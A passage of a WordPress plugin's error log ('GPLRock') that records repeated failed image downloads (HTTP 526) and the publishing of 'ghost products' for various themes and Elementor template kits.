Retrying... [05-Apr-2026 18:40:19 UTC] GPLRock: Image download failed for product kanni-home-automation-cctv-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kanni---home-automation-cctv-security-wordpress-theme-21373.webp for product kanni-home-automation-cctv-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:21 UTC] GPLRock WARNING: Image download failed for product kanni-home-automation-cctv-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kanni---home-automation-cctv-security-wordpress-theme-21373.webp [05-Apr-2026 18:40:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kanni-home-automation-cctv-security-wordpress-theme [05-Apr-2026 18:40:22 UTC] GPLRock: Image download failed for product ters-contemporary-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:24 UTC] GPLRock: Image download failed for product ters-contemporary-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ters--contemporary-event-wordpress-theme-27110.webp for product ters-contemporary-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:26 UTC] GPLRock: Image download failed for product ters-contemporary-event-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:28 UTC] GPLRock: Image download failed for product ters-contemporary-event-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ters--contemporary-event-wordpress-theme-27110.webp for product ters-contemporary-event-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:30 UTC] GPLRock WARNING: Image download failed for product ters-contemporary-event-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ters--contemporary-event-wordpress-theme-27110.webp [05-Apr-2026 18:40:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ters-contemporary-event-wordpress-theme [05-Apr-2026 18:40:30 UTC] GPLRock: Image downloaded successfully for product xenia-refined-wordpress-corporate-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20c3f537.webp [05-Apr-2026 18:40:30 UTC] GPLRock: Using pre-downloaded image for product xenia-refined-wordpress-corporate-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-20c3f537.webp [05-Apr-2026 18:40:30 UTC] GPLRock: Ghost product published with image - Product ID: xenia-refined-wordpress-corporate-theme [05-Apr-2026 18:40:31 UTC] GPLRock: Image download failed for product povert-nonprofit-fundraising-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:33 UTC] GPLRock: Image download failed for product povert-nonprofit-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/povert---nonprofit-fundraising-charity-wordpress-theme-23735.webp for product povert-nonprofit-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:35 UTC] GPLRock: Image download failed for product povert-nonprofit-fundraising-charity-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:37 UTC] GPLRock: Image download failed for product povert-nonprofit-fundraising-charity-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/povert---nonprofit-fundraising-charity-wordpress-theme-23735.webp for product povert-nonprofit-fundraising-charity-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:39 UTC] GPLRock WARNING: Image download failed for product povert-nonprofit-fundraising-charity-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/povert---nonprofit-fundraising-charity-wordpress-theme-23735.webp [05-Apr-2026 18:40:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: povert-nonprofit-fundraising-charity-wordpress-theme [05-Apr-2026 18:40:39 UTC] GPLRock: Image download failed for product allmart-ultimate-electronics-gadgets-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:41 UTC] GPLRock: Image download failed for product allmart-ultimate-electronics-gadgets-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allmart---ultimate-electronics--gadgets-store-wordpress-theme-12347.webp for product allmart-ultimate-electronics-gadgets-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:44 UTC] GPLRock: Image download failed for product allmart-ultimate-electronics-gadgets-store-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:46 UTC] GPLRock: Image download failed for product allmart-ultimate-electronics-gadgets-store-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/allmart---ultimate-electronics--gadgets-store-wordpress-theme-12347.webp for product allmart-ultimate-electronics-gadgets-store-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:48 UTC] GPLRock WARNING: Image download failed for product allmart-ultimate-electronics-gadgets-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/allmart---ultimate-electronics--gadgets-store-wordpress-theme-12347.webp [05-Apr-2026 18:40:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: allmart-ultimate-electronics-gadgets-store-wordpress-theme [05-Apr-2026 18:40:48 UTC] GPLRock: Image download failed for product jango-highly-flexible-component-based-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:50 UTC] GPLRock: Image download failed for product jango-highly-flexible-component-based-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jango--highly-flexible-component-based-wp-theme-25862.webp for product jango-highly-flexible-component-based-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:53 UTC] GPLRock: Image download failed for product jango-highly-flexible-component-based-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:55 UTC] GPLRock: Image download failed for product jango-highly-flexible-component-based-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jango--highly-flexible-component-based-wp-theme-25862.webp for product jango-highly-flexible-component-based-wp-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:40:57 UTC] GPLRock WARNING: Image download failed for product jango-highly-flexible-component-based-wp-theme. URL: https://meldwp.com/wp-content/uploads/jango--highly-flexible-component-based-wp-theme-25862.webp [05-Apr-2026 18:40:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jango-highly-flexible-component-based-wp-theme [05-Apr-2026 18:40:57 UTC] GPLRock: Image download failed for product slide-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:40:59 UTC] GPLRock: Image download failed for product slide-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:41:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slide---music-wordpress-theme-21761.webp for product slide-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:41:02 UTC] GPLRock: Image download failed for product slide-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:41:04 UTC] GPLRock: Image download failed for product slide-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:41:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/slide---music-wordpress-theme-21761.webp for product slide-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:41:06 UTC] GPLRock WARNING: Image download failed for product slide-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/slide---music-wordpress-theme-21761.webp [05-Apr-2026 18:41:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: slide-music-wordpress-theme [05-Apr-2026 18:42:37 UTC] GPLRock: Image download failed for product saja-minimal-agency-portfolio-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:39 UTC] GPLRock: Image download failed for product saja-minimal-agency-portfolio-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saja--minimal-agency--portfolio-wordpress-theme--rtl-13503.webp for product saja-minimal-agency-portfolio-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:42:45 UTC] GPLRock: Image download failed for product saja-minimal-agency-portfolio-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:47 UTC] GPLRock: Image download failed for product saja-minimal-agency-portfolio-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saja--minimal-agency--portfolio-wordpress-theme--rtl-13503.webp for product saja-minimal-agency-portfolio-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:42:49 UTC] GPLRock WARNING: Image download failed for product saja-minimal-agency-portfolio-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/saja--minimal-agency--portfolio-wordpress-theme--rtl-13503.webp [05-Apr-2026 18:42:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saja-minimal-agency-portfolio-wordpress-theme-rtl [05-Apr-2026 18:42:49 UTC] GPLRock: Image download failed for product richter-creative-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:51 UTC] GPLRock: Image download failed for product richter-creative-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/richter--creative-wordpress-blog-theme-572.webp for product richter-creative-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:42:54 UTC] GPLRock: Image download failed for product richter-creative-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:56 UTC] GPLRock: Image download failed for product richter-creative-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:42:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/richter--creative-wordpress-blog-theme-572.webp for product richter-creative-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:42:58 UTC] GPLRock WARNING: Image download failed for product richter-creative-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/richter--creative-wordpress-blog-theme-572.webp [05-Apr-2026 18:42:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: richter-creative-wordpress-blog-theme [05-Apr-2026 18:42:58 UTC] GPLRock: Image download failed for product hedmark-clean-minimal-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:00 UTC] GPLRock: Image download failed for product hedmark-clean-minimal-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hedmark--clean--minimal-responsive-wordpress-blog-theme-18677.webp for product hedmark-clean-minimal-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:09 UTC] GPLRock: Image download failed for product hedmark-clean-minimal-responsive-wordpress-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:11 UTC] GPLRock: Image download failed for product hedmark-clean-minimal-responsive-wordpress-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hedmark--clean--minimal-responsive-wordpress-blog-theme-18677.webp for product hedmark-clean-minimal-responsive-wordpress-blog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:13 UTC] GPLRock WARNING: Image download failed for product hedmark-clean-minimal-responsive-wordpress-blog-theme. URL: https://meldwp.com/wp-content/uploads/hedmark--clean--minimal-responsive-wordpress-blog-theme-18677.webp [05-Apr-2026 18:43:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hedmark-clean-minimal-responsive-wordpress-blog-theme [05-Apr-2026 18:43:14 UTC] GPLRock: Image download failed for product eventime-conference-event-fest-ticket-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:17 UTC] GPLRock: Image download failed for product eventime-conference-event-fest-ticket-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventime---conference-event-fest-ticket-store-theme-23881.webp for product eventime-conference-event-fest-ticket-store-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:19 UTC] GPLRock: Image download failed for product eventime-conference-event-fest-ticket-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:21 UTC] GPLRock: Image download failed for product eventime-conference-event-fest-ticket-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventime---conference-event-fest-ticket-store-theme-23881.webp for product eventime-conference-event-fest-ticket-store-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:23 UTC] GPLRock WARNING: Image download failed for product eventime-conference-event-fest-ticket-store-theme. URL: https://meldwp.com/wp-content/uploads/eventime---conference-event-fest-ticket-store-theme-23881.webp [05-Apr-2026 18:43:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventime-conference-event-fest-ticket-store-theme [05-Apr-2026 18:43:23 UTC] GPLRock: Image download failed for product lawbusiness-attorney-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:26 UTC] GPLRock: Image download failed for product lawbusiness-attorney-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawbusiness---attorney--lawyer-wordpress-theme-4760.webp for product lawbusiness-attorney-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:28 UTC] GPLRock: Image download failed for product lawbusiness-attorney-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:30 UTC] GPLRock: Image download failed for product lawbusiness-attorney-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lawbusiness---attorney--lawyer-wordpress-theme-4760.webp for product lawbusiness-attorney-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:32 UTC] GPLRock WARNING: Image download failed for product lawbusiness-attorney-lawyer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lawbusiness---attorney--lawyer-wordpress-theme-4760.webp [05-Apr-2026 18:43:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lawbusiness-attorney-lawyer-wordpress-theme [05-Apr-2026 18:43:32 UTC] GPLRock: Image download failed for product cryptoz-ico-and-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:35 UTC] GPLRock: Image download failed for product cryptoz-ico-and-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptoz--ico-and-crypto-wordpress-theme-6868.webp for product cryptoz-ico-and-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:37 UTC] GPLRock: Image download failed for product cryptoz-ico-and-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:39 UTC] GPLRock: Image download failed for product cryptoz-ico-and-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cryptoz--ico-and-crypto-wordpress-theme-6868.webp for product cryptoz-ico-and-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:41 UTC] GPLRock WARNING: Image download failed for product cryptoz-ico-and-crypto-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cryptoz--ico-and-crypto-wordpress-theme-6868.webp [05-Apr-2026 18:43:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cryptoz-ico-and-crypto-wordpress-theme [05-Apr-2026 18:43:41 UTC] GPLRock: Image download failed for product sheon-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:43 UTC] GPLRock: Image download failed for product sheon-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sheon---multipurpose-woocommerce-theme-5456.webp for product sheon-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:46 UTC] GPLRock: Image download failed for product sheon-multipurpose-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:48 UTC] GPLRock: Image download failed for product sheon-multipurpose-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sheon---multipurpose-woocommerce-theme-5456.webp for product sheon-multipurpose-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:50 UTC] GPLRock WARNING: Image download failed for product sheon-multipurpose-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/sheon---multipurpose-woocommerce-theme-5456.webp [05-Apr-2026 18:43:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sheon-multipurpose-woocommerce-theme [05-Apr-2026 18:43:50 UTC] GPLRock: Image download failed for product organici-organic-store-bakery-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:52 UTC] GPLRock: Image download failed for product organici-organic-store-bakery-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organici---organic-store--bakery-woocommerce-theme-884.webp for product organici-organic-store-bakery-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:55 UTC] GPLRock: Image download failed for product organici-organic-store-bakery-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:57 UTC] GPLRock: Image download failed for product organici-organic-store-bakery-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:43:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/organici---organic-store--bakery-woocommerce-theme-884.webp for product organici-organic-store-bakery-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:43:59 UTC] GPLRock WARNING: Image download failed for product organici-organic-store-bakery-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/organici---organic-store--bakery-woocommerce-theme-884.webp [05-Apr-2026 18:43:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: organici-organic-store-bakery-woocommerce-theme [05-Apr-2026 18:43:59 UTC] GPLRock: Image download failed for product forum-a-responsive-wordpress-theme-for-bbpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:01 UTC] GPLRock: Image download failed for product forum-a-responsive-wordpress-theme-for-bbpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forum---a-responsive-wordpress-theme-for-bbpress-plugin-16662.webp for product forum-a-responsive-wordpress-theme-for-bbpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:44:04 UTC] GPLRock: Image download failed for product forum-a-responsive-wordpress-theme-for-bbpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:06 UTC] GPLRock: Image download failed for product forum-a-responsive-wordpress-theme-for-bbpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/forum---a-responsive-wordpress-theme-for-bbpress-plugin-16662.webp for product forum-a-responsive-wordpress-theme-for-bbpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:44:08 UTC] GPLRock WARNING: Image download failed for product forum-a-responsive-wordpress-theme-for-bbpress-plugin. URL: https://meldwp.com/wp-content/uploads/forum---a-responsive-wordpress-theme-for-bbpress-plugin-16662.webp [05-Apr-2026 18:44:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: forum-a-responsive-wordpress-theme-for-bbpress-plugin [05-Apr-2026 18:44:08 UTC] GPLRock: Image download failed for product glowify-beauty-and-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:10 UTC] GPLRock: Image download failed for product glowify-beauty-and-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glowify---beauty-and-cosmetics-shop-wordpress-theme-26220.webp for product glowify-beauty-and-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:44:15 UTC] GPLRock: Image download failed for product glowify-beauty-and-cosmetics-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:17 UTC] GPLRock: Image download failed for product glowify-beauty-and-cosmetics-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 18:44:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glowify---beauty-and-cosmetics-shop-wordpress-theme-26220.webp for product glowify-beauty-and-cosmetics-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 18:44:19 UTC] GPLRock WARNING: Image download failed for product glowify-beauty-and-cosmetics-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glowify---beauty-and-cosmetics-shop-wordpress-theme-26220.webp [05-Apr-2026 18:44:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glowify-beauty-and-cosmetics-shop-wordpress-theme [05-Apr-2026 18:46:21 UTC] GPLRock: Image downloaded successfully for product cohubz-creative-hub-coworking-space-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e91f1565.webp [05-Apr-2026 18:46:21 UTC] GPLRock: Using pre-downloaded image for product cohubz-creative-hub-coworking-space-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e91f1565.webp [05-Apr-2026 18:46:22 UTC] GPLRock: Ghost product published with image - Product ID: cohubz-creative-hub-coworking-space-elementor-template-kit [05-Apr-2026 18:46:23 UTC] GPLRock: Image downloaded successfully for product coffeekup-cafe-coffee-shop-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e527cae.jpg [05-Apr-2026 18:46:23 UTC] GPLRock: Using pre-downloaded image for product coffeekup-cafe-coffee-shop-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6e527cae.jpg [05-Apr-2026 18:46:23 UTC] GPLRock: Ghost product published with image - Product ID: coffeekup-cafe-coffee-shop-elementor-template-kit [05-Apr-2026 18:46:25 UTC] GPLRock: Image downloaded successfully for product coffeeine-coffee-shop-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5737a32e.jpg [05-Apr-2026 18:46:25 UTC] GPLRock: Using pre-downloaded image for product coffeeine-coffee-shop-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5737a32e.jpg [05-Apr-2026 18:46:25 UTC] GPLRock: Ghost product published with image - Product ID: coffeeine-coffee-shop-cafe-elementor-template-kit [05-Apr-2026 18:46:27 UTC] GPLRock: Image downloaded successfully for product chloro-skincare-dermatology-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6592be0.webp [05-Apr-2026 18:46:27 UTC] GPLRock: Using pre-downloaded image for product chloro-skincare-dermatology-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c6592be0.webp [05-Apr-2026 18:46:27 UTC] GPLRock: Ghost product published with image - Product ID: chloro-skincare-dermatology-elementor-template-kit [05-Apr-2026 18:46:28 UTC] GPLRock: Image downloaded successfully for product childhood-kids-child-care-center-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4358bef0.webp [05-Apr-2026 18:46:28 UTC] GPLRock: Using pre-downloaded image for product childhood-kids-child-care-center-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4358bef0.webp [05-Apr-2026 18:46:28 UTC] GPLRock: Ghost product published with image - Product ID: childhood-kids-child-care-center-elementor-template-kit [05-Apr-2026 18:46:29 UTC] GPLRock: Image downloaded successfully for product chikapoe-pet-care-veterinary-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-124362f7.webp [05-Apr-2026 18:46:30 UTC] GPLRock: Using pre-downloaded image for product chikapoe-pet-care-veterinary-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-124362f7.webp [05-Apr-2026 18:46:30 UTC] GPLRock: Ghost product published with image - Product ID: chikapoe-pet-care-veterinary-elementor-template-kit [05-Apr-2026 18:46:31 UTC] GPLRock: Image downloaded successfully for product chief-modern-barbershop-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9e485e9.webp [05-Apr-2026 18:46:31 UTC] GPLRock: Using pre-downloaded image for product chief-modern-barbershop-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e9e485e9.webp [05-Apr-2026 18:46:31 UTC] GPLRock: Ghost product published with image - Product ID: chief-modern-barbershop-template-kit [05-Apr-2026 18:46:32 UTC] GPLRock: Image downloaded successfully for product chefmaster-restaurant-cafe-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ec6237.webp [05-Apr-2026 18:46:32 UTC] GPLRock: Using pre-downloaded image for product chefmaster-restaurant-cafe-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5ec6237.webp [05-Apr-2026 18:46:32 UTC] GPLRock: Ghost product published with image - Product ID: chefmaster-restaurant-cafe-elementor-template-kit [05-Apr-2026 18:46:34 UTC] GPLRock: Image downloaded successfully for product checkmate-chess-club-tournaments-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f6a2199.webp [05-Apr-2026 18:46:34 UTC] GPLRock: Using pre-downloaded image for product checkmate-chess-club-tournaments-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f6a2199.webp [05-Apr-2026 18:46:34 UTC] GPLRock: Ghost product published with image - Product ID: checkmate-chess-club-tournaments-elementor-template-kit [05-Apr-2026 18:46:35 UTC] GPLRock: Image downloaded successfully for product chauni-roofing-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5d0f7b3.webp [05-Apr-2026 18:46:36 UTC] GPLRock: Using pre-downloaded image for product chauni-roofing-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d5d0f7b3.webp [05-Apr-2026 18:46:36 UTC] GPLRock: Ghost product published 